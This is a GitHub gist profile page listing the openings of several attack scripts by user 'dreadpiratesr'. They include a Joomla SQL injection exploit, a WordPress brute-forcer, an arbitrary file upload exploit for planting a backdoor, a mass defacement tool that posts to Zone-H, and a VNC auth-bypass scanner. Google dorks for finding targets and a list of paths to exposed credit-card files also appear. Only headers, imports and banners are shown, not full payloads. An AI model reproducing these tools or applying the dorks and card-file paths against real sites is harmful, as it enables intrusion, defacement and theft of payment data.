Skip to content

Instantly share code, notes, and snippets.

View dreadpiratesr's full-sized avatar

niño orsino dreadpiratesr

View GitHub Profile
#!/usr/bin/perl
#Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit
#Google Dork: inurl:index.php?option=com_s5clanroster&
#Vendor HomePage: http://www.joomla.org/
system("clear");
system("cls");
print "=========================================================\n";
print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n";
print "* Coded dreadpiratesr *\n";
print "* *\n";
#!/usr/bin/perl
# WP-BRUTE BY DPR
# dreadpiratesr
use LWP::UserAgent;
$site = $ARGV[0];
$user = $ARGV[1];
$wordl = $ARGV[2];
#!/usr/bin/perl
#EXPLOIT: http://www.exploit4arab.net/exploits/1433
use LWP::UserAgent;
use strict;
use warnings;
sub banner {
print "[!] [ EXPLOIT NAME ]: Wordpress event Calendar Plugin - (AFU)Arbitrary File Upload / EDIT GoogleINURL\n";
print "[!] [ usage ]: perl $0 www.target.gov.crot backdoor.php.gif\n";
print "--------------------------------------------------------------------------------------------------------------------\n";
#!/usr/bin/perl
# Themes Mass Exploiter Wordpress & Auto Post Zone-h
# Upload File and Submit your defacements on Zone-H
# TEAM : dreadpiratesr
# https://twitter.com/blackmarketi2p
# Author : dpr
# USAGE => perl bt.pl
use HTTP::Request;
use LWP::Simple;
#!/usr/bin/perl
use LWP::UserAgent;
use LWP::Simple;
use strict;
use warnings;
use threads;
use threads::shared;
use Config;
use HTML::TreeBuilder;
#!/usr/bin/perl
# Scanner VNC - OpenVNC 4.11 authentication bypass By GhOsTrIaX
use strict;
use warnings;
use IO::Socket;
use threads;
use threads::shared;
use Errno qw(EAGAIN);
Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
Product Description
——————-
Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
We provide world-class technology services by constantly exploring and implementing innovative
solutions that drive long-term value to our customers. We have been providing solutions to clients
across the globe for more than 5 years and boast of our extensive
experience on website designing and development projects.
/cgi-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log /scripts/cart32.exe
/cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt /cgi-local/cart.pl
import socket
import random
import os, sys
import threading
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = ' clear'
else:
clearing = 'cls'
os.system(clearing)

Keybase proof

I hereby claim:

  • I am dreadpiratesr on github.
  • I am dreadpiratesr (https://keybase.io/dreadpiratesr) on keybase.
  • I have a public key whose fingerprint is 3A74 1C92 2992 DC81 5C77 0E45 5C83 1AF6 AE26 CC2C

To claim this, I am signing this object: